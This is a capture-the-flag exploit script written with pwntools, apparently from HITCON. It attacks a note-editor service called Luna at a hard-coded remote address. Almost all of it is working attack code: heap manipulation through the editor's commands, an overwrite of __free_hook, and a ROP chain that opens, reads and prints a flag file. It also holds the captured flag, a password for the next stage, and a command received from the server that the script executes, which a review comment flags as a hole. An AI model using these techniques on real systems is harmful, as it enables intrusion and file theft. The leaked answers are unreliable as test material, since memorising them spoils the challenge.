#!/usr/bin/env python
from pwn import *
# hitcon{achievement: Defeat Luna}
'''
hitcon{achievement: Defeat Luna}
Password for PoE II: c8ecf647f0238e24cb3f96f45c7f54e2f33578d0
'''
# Target is a 64-bit binary (only affects pwntools packing helpers such as flat/p64).
context.arch = 'amd64'
# Remote challenge endpoint exactly as recorded on this page; every helper
# below talks to this single module-level connection `y`.
y = remote( '13.230.132.4' , 21700 )
def insert(idx, data):
    """Send the 'i' (insert) command on the module-level connection `y`.

    After the prompt, the service is given the index as a decimal line and
    then `data` as its own line (sent verbatim, not str()-wrapped).
    """
    y.sendlineafter('>>> ', 'i')
    # Original note next to the data line read "0x100" -- presumably the
    # service's input buffer size; not verifiable from this script.
    for line in (str(idx), data):
        y.sendline(line)
def new_tab():
    """Send the 'n' (new tab) command on the module-level connection `y`."""
    prompt = '>>> '
    y.sendlineafter(prompt, 'n')
def select(tid):
    """Send the 's' (select tab) command followed by the tab id `tid`."""
    y.sendlineafter('>>> ', 's')
    tab_line = str(tid)
    y.sendline(tab_line)
def display(idx, l):
    """Send the 'd' (display) command with a start index and a length."""
    y.sendlineafter('>>> ', 'd')
    for arg in (idx, l):
        y.sendline(str(arg))
def cut(idx, l):
    """Send the 'c' (cut) command with a start index and a length."""
    y.sendlineafter('>>> ', 'c')
    for arg in (idx, l):
        y.sendline(str(arg))
def paste(idx):
    """Send the 'p' (paste) command followed by the target index."""
    y.sendlineafter('>>> ', 'p')
    index_line = str(idx)
    y.sendline(index_line)
def replace(idx, l, c):
    """Send the 'r' (replace) command: index, length, then replacement text `c`.

    `c` is sent as-is (not str()-wrapped), so callers pass raw bytes/str.
    """
    y.sendlineafter('>>> ', 'r')
    for arg in (idx, l):
        y.sendline(str(arg))
    y.sendline(c)
def reverse(idx, l):
    """Send the 'R' (reverse) command with a start index and a length."""
    y.sendlineafter('>>> ', 'R')
    for arg in (idx, l):
        y.sendline(str(arg))
def delete(idx, l):
    """Send the 'D' (delete) command with a start index and a length."""
    y.sendlineafter('>>> ', 'D')
    for arg in (idx, l):
        y.sendline(str(arg))
def wri(idx, data):
    """Write `data` one character at a time through replace(), starting at `idx`.

    NUL characters are skipped (their positions are left untouched) because
    replace() sends each character as a line and cannot carry a NUL.
    """
    position = idx
    for ch in data:
        if ch != '\0':
            replace(position, 1, ch)
        position += 1
# Proof-of-work handshake: after "of:\n" the service prints a command line,
# which is run locally and whose output is sent back.  `subprocess` comes in
# via `from pwn import *`.
y.recvuntil('of:\n')
cmd = y.recvline().strip()
# NOTE(review): `cmd` is received straight from the remote peer and executed
# on the operator's machine.  Passing a list avoids shell interpretation, but
# the program name and arguments are never validated, so an impersonated or
# compromised server could make this script run an arbitrary local binary.
# Check the executable against the expected proof-of-work tool before running
# this against any host you do not control.
res = subprocess.check_output(cmd.split()).strip()
print res
y.sendline( res )
# Service banner; presumably printed once the proof-of-work is accepted.
y.recvuntil( 'Luna - the Legendary Ultra Note Accelerator' )
# Hard-coded addresses for the specific challenge build this script targeted;
# the gadget descriptions are the author's.  None of these values can be
# checked from this page and they apply to that exact binary only.
gg = 0x4c35d8 # xchg eax, edi ; xchg eax, esp ; ret
pop_rdi = 0x4006a6
ppr = 0x44d859 # pop rdx ; pop rsi ; ret
_open = 0x44a960
read = 0x44ab20
write = 0x44abf0
ret = 0x40042e
free_hook = 0x6D9E78
# First note body: 0xd0 bytes padded with 'a', then a trailing record.  The
# inline field labels are the author's; flat() packs according to context.arch.
p = flat(
'a' * 0x10,
p32( 0x100 ), p32( 0 ), 0, # size , id , freed
free_hook , 0,
'/home/poe/flag1\0',
pop_rdi, 0,
ppr , 0x200 , 0x6d93d0,
read
).ljust( 0xd0 , 'a' )
p += flat(
p32( 0x100 ), p32( 0 ), 0, # size , id , freed
0x6d9390 + 0x10
)
# Sequence of note-editor operations; the numbered trailing comments are the
# author's tab indices.
insert( 0 , p ) # 0
new_tab()
insert( 0 , 'a' * 0x18 ) # 1
cut( 0 , 0x18 )
select( 0 )
cut( 0 , 0xe0 )
new_tab()
paste( 0 )
new_tab() # realloc( ptr , 0x20 )
select( 2 )
replace( 0x60 , 1 , '\x70' )
replace( 0x68 , 1 , '\x30' )
select( 0 )
# Writes the 8 packed bytes of `gg` into tab 0 one character at a time (see wri).
wri( 0 , p64( gg ) )
# Second payload, sent after the free hook fires; the "fd = 5" remark is the author's.
p = flat(
( pop_rdi, 0x6d9390, ppr, 0, 0, _open ) * 3, # open * 3 -> fd = 5
pop_rdi, 5,
ppr , 0x100 , 0x6d9360,
read,
pop_rdi, 1,
write,
)
select( 1 )
insert( 0 , 'a' ) # trigger __free_hook
# Short pause before sending the second payload; the reason is not stated here.
sleep(0.7)
y.sendline( p )
y.interactive()